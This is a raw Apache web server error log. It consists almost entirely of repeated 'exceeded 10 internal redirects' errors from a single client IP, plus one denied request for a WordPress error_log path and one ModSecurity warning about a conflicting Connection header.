[Mon May 11 19:14:07.363852 2026] [core:error] [pid 1501831:tid 1501856] [client 52.172.142.96:6266] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:07.363971 2026] [core:error] [pid 1501831:tid 1501856] [client 52.172.142.96:6266] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:07.814699 2026] [core:error] [pid 1511173:tid 1511195] [client 52.172.142.96:6717] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:07.814831 2026] [core:error] [pid 1511173:tid 1511195] [client 52.172.142.96:6717] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:08.453284 2026] [core:error] [pid 1501883:tid 1501909] [client 52.172.142.96:6205] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:08.453454 2026] [core:error] [pid 1501883:tid 1501909] [client 52.172.142.96:6205] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:08.880586 2026] [core:error] [pid 1501831:tid 1501840] [client 52.172.142.96:6173] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:08.880711 2026] [core:error] [pid 1501831:tid 1501840] [client 52.172.142.96:6173] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:09.329466 2026] [core:error] [pid 1501883:tid 1501908] [client 52.172.142.96:6231] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:09.329501 2026] [core:error] [pid 1501883:tid 1501908] [client 52.172.142.96:6231] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:10.118055 2026] [core:error] [pid 1502013:tid 1502033] [client 52.172.142.96:6207] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:10.118278 2026] [core:error] [pid 1502013:tid 1502033] [client 52.172.142.96:6207] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:10.876537 2026] [core:error] [pid 1501883:tid 1501896] [client 52.172.142.96:6703] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:10.876672 2026] [core:error] [pid 1501883:tid 1501896] [client 52.172.142.96:6703] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:11.387089 2026] [core:error] [pid 1501831:tid 1501835] [client 52.172.142.96:6165] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:11.387121 2026] [core:error] [pid 1501831:tid 1501835] [client 52.172.142.96:6165] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:12.011542 2026] [core:error] [pid 1511173:tid 1511190] [client 52.172.142.96:6670] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:12.011579 2026] [core:error] [pid 1511173:tid 1511190] [client 52.172.142.96:6670] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:12.814231 2026] [core:error] [pid 1424905:tid 1424912] [client 52.172.142.96:6252] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:12.814276 2026] [core:error] [pid 1424905:tid 1424912] [client 52.172.142.96:6252] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:13.203482 2026] [core:error] [pid 1511173:tid 1511196] [client 52.172.142.96:6187] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:13.203889 2026] [core:error] [pid 1511173:tid 1511196] [client 52.172.142.96:6187] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:13.472913 2026] [authz_core:error] [pid 1502013:tid 1502045] [client 47.128.58.65:47690] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/customize/error_log
[Mon May 11 19:14:13.591746 2026] [core:error] [pid 1501883:tid 1501885] [client 52.172.142.96:6147] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:13.591782 2026] [core:error] [pid 1501883:tid 1501885] [client 52.172.142.96:6147] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:13.996933 2026] [core:error] [pid 1424905:tid 1424926] [client 52.172.142.96:9558] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:13.996970 2026] [core:error] [pid 1424905:tid 1424926] [client 52.172.142.96:9558] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:14.391650 2026] [core:error] [pid 1501831:tid 1501849] [client 52.172.142.96:9537] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:14.391686 2026] [core:error] [pid 1501831:tid 1501849] [client 52.172.142.96:9537] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:14.786021 2026] [core:error] [pid 1511173:tid 1511199] [client 52.172.142.96:6170] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:14.786057 2026] [core:error] [pid 1511173:tid 1511199] [client 52.172.142.96:6170] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:16.367945 2026] [core:error] [pid 1502013:tid 1502048] [client 52.172.142.96:9555] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:16.367983 2026] [core:error] [pid 1502013:tid 1502048] [client 52.172.142.96:9555] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:16.770126 2026] [core:error] [pid 1511173:tid 1511178] [client 52.172.142.96:9559] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:16.770173 2026] [core:error] [pid 1511173:tid 1511178] [client 52.172.142.96:9559] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:17.213865 2026] [core:error] [pid 1501883:tid 1501895] [client 52.172.142.96:9571] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:17.213897 2026] [core:error] [pid 1501883:tid 1501895] [client 52.172.142.96:9571] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:17.657976 2026] [core:error] [pid 1501831:tid 1501854] [client 52.172.142.96:9589] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:17.658134 2026] [core:error] [pid 1501831:tid 1501854] [client 52.172.142.96:9589] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:18.209246 2026] [core:error] [pid 1501883:tid 1501887] [client 52.172.142.96:6171] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:18.209290 2026] [core:error] [pid 1501883:tid 1501887] [client 52.172.142.96:6171] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:18.396518 2026] [security2:error] [pid 1424905:tid 1424928] [client 124.156.200.223:34012] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "k06.fr"] [uri "/"] [unique_id "agIOaoW8yzYoWG_eyCXQowAAAVQ"]
[Mon May 11 19:14:18.602995 2026] [core:error] [pid 1511173:tid 1511198] [client 52.172.142.96:9594] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:18.603027 2026] [core:error] [pid 1511173:tid 1511198] [client 52.172.142.96:9594] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:19.034741 2026] [core:error] [pid 1501831:tid 1501855] [client 52.172.142.96:9548] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:19.034781 2026] [core:error] [pid 1501831:tid 1501855] [client 52.172.142.96:9548] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:19.422924 2026] [core:error] [pid 1511173:tid 1511176] [client 52.172.142.96:9596] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:19.423056 2026] [core:error] [pid 1511173:tid 1511176] [client 52.172.142.96:9596] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:19.822755 2026] [core:error] [pid 1502013:tid 1502059] [client 52.172.142.96:6183] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:19.822788 2026] [core:error] [pid 1502013:tid 1502059] [client 52.172.142.96:6183] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:20.216837 2026] [core:error] [pid 1424905:tid 1424929] [client 52.172.142.96:6241] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:20.216877 2026] [core:error] [pid 1424905:tid 1424929] [client 52.172.142.96:6241] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:20.744192 2026] [core:error] [pid 1501831:tid 1501847] [client 52.172.142.96:6177] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:20.744317 2026] [core:error] [pid 1501831:tid 1501847] [client 52.172.142.96:6177] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:21.128272 2026] [core:error] [pid 1424905:tid 1424920] [client 52.172.142.96:9579] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:21.128303 2026] [core:error] [pid 1424905:tid 1424920] [client 52.172.142.96:9579] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:21.513507 2026] [core:error] [pid 1501831:tid 1501833] [client 52.172.142.96:6216] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:21.513546 2026] [core:error] [pid 1501831:tid 1501833] [client 52.172.142.96:6216] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:21.913479 2026] [core:error] [pid 1511173:tid 1511179] [client 52.172.142.96:9592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:21.913514 2026] [core:error] [pid 1511173:tid 1511179] [client 52.172.142.96:9592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:22.347729 2026] [core:error] [pid 1501883:tid 1501888] [client 52.172.142.96:9564] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:22.347764 2026] [core:error] [pid 1501883:tid 1501888] [client 52.172.142.96:9564] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:22.733617 2026] [core:error] [pid 1502013:tid 1502038] [client 52.172.142.96:6211] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:22.733738 2026] [core:error] [pid 1502013:tid 1502038] [client 52.172.142.96:6211] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:23.151505 2026] [core:error] [pid 1424905:tid 1424930] [client 52.172.142.96:6223] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:23.151537 2026] [core:error] [pid 1424905:tid 1424930] [client 52.172.142.96:6223] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:23.537211 2026] [core:error] [pid 1511173:tid 1511183] [client 52.172.142.96:6184] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:23.537244 2026] [core:error] [pid 1511173:tid 1511183] [client 52.172.142.96:6184] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:23.937063 2026] [core:error] [pid 1502013:tid 1502031] [client 52.172.142.96:6255] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:23.937100 2026] [core:error] [pid 1502013:tid 1502031] [client 52.172.142.96:6255] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:24.393417 2026] [core:error] [pid 1424905:tid 1424931] [client 52.172.142.96:6145] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:24.393612 2026] [core:error] [pid 1424905:tid 1424931] [client 52.172.142.96:6145] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:24.986881 2026] [core:error] [pid 1501831:tid 1501842] [client 52.172.142.96:6156] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:24.986996 2026] [core:error] [pid 1501831:tid 1501842] [client 52.172.142.96:6156] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:25.374964 2026] [core:error] [pid 1424905:tid 1424924] [client 52.172.142.96:6238] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:25.375001 2026] [core:error] [pid 1424905:tid 1424924] [client 52.172.142.96:6238] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:25.803835 2026] [core:error] [pid 1501831:tid 1501856] [client 52.172.142.96:9557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:25.803892 2026] [core:error] [pid 1501831:tid 1501856] [client 52.172.142.96:9557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:26.193477 2026] [core:error] [pid 1511173:tid 1511194] [client 52.172.142.96:6692] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:26.193612 2026] [core:error] [pid 1511173:tid 1511194] [client 52.172.142.96:6692] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:26.600919 2026] [core:error] [pid 1501883:tid 1501908] [client 52.172.142.96:6691] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:26.600956 2026] [core:error] [pid 1501883:tid 1501908] [client 52.172.142.96:6691] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:26.990906 2026] [core:error] [pid 1502013:tid 1502032] [client 52.172.142.96:6147] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:26.990939 2026] [core:error] [pid 1502013:tid 1502032] [client 52.172.142.96:6147] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:27.375640 2026] [core:error] [pid 1424905:tid 1424913] [client 52.172.142.96:6217] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:27.375682 2026] [core:error] [pid 1424905:tid 1424913] [client 52.172.142.96:6217] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:27.788224 2026] [core:error] [pid 1511173:tid 1511192] [client 52.172.142.96:6263] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:27.788258 2026] [core:error] [pid 1511173:tid 1511192] [client 52.172.142.96:6263] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:28.189824 2026] [core:error] [pid 1501831:tid 1501837] [client 52.172.142.96:10020] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:28.189859 2026] [core:error] [pid 1501831:tid 1501837] [client 52.172.142.96:10020] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:28.598139 2026] [core:error] [pid 1511173:tid 1511193] [client 52.172.142.96:6210] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:28.598184 2026] [core:error] [pid 1511173:tid 1511193] [client 52.172.142.96:6210] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:29.017745 2026] [core:error] [pid 1424905:tid 1424910] [client 52.172.142.96:9988] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:29.017779 2026] [core:error] [pid 1424905:tid 1424910] [client 52.172.142.96:9988] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:29.410095 2026] [core:error] [pid 1501831:tid 1501835] [client 52.172.142.96:7563] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:29.410134 2026] [core:error] [pid 1501831:tid 1501835] [client 52.172.142.96:7563] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:29.801266 2026] [core:error] [pid 1501883:tid 1501885] [client 52.172.142.96:10022] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:29.801303 2026] [core:error] [pid 1501883:tid 1501885] [client 52.172.142.96:10022] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:30.195066 2026] [core:error] [pid 1502013:tid 1502058] [client 52.172.142.96:9542] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:30.195103 2026] [core:error] [pid 1502013:tid 1502058] [client 52.172.142.96:9542] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:30.593675 2026] [core:error] [pid 1424905:tid 1424926] [client 52.172.142.96:10008] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:30.593704 2026] [core:error] [pid 1424905:tid 1424926] [client 52.172.142.96:10008] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:30.986655 2026] [core:error] [pid 1511173:tid 1511196] [client 52.172.142.96:6285] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:30.986689 2026] [core:error] [pid 1511173:tid 1511196] [client 52.172.142.96:6285] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:31.413930 2026] [core:error] [pid 1502013:tid 1502048] [client 52.172.142.96:9564] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:31.413965 2026] [core:error] [pid 1502013:tid 1502048] [client 52.172.142.96:9564] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:31.807687 2026] [core:error] [pid 1511173:tid 1511199] [client 52.172.142.96:10026] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:31.807723 2026] [core:error] [pid 1511173:tid 1511199] [client 52.172.142.96:10026] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:32.208926 2026] [core:error] [pid 1501883:tid 1501895] [client 52.172.142.96:9569] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:32.208961 2026] [core:error] [pid 1501883:tid 1501895] [client 52.172.142.96:9569] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
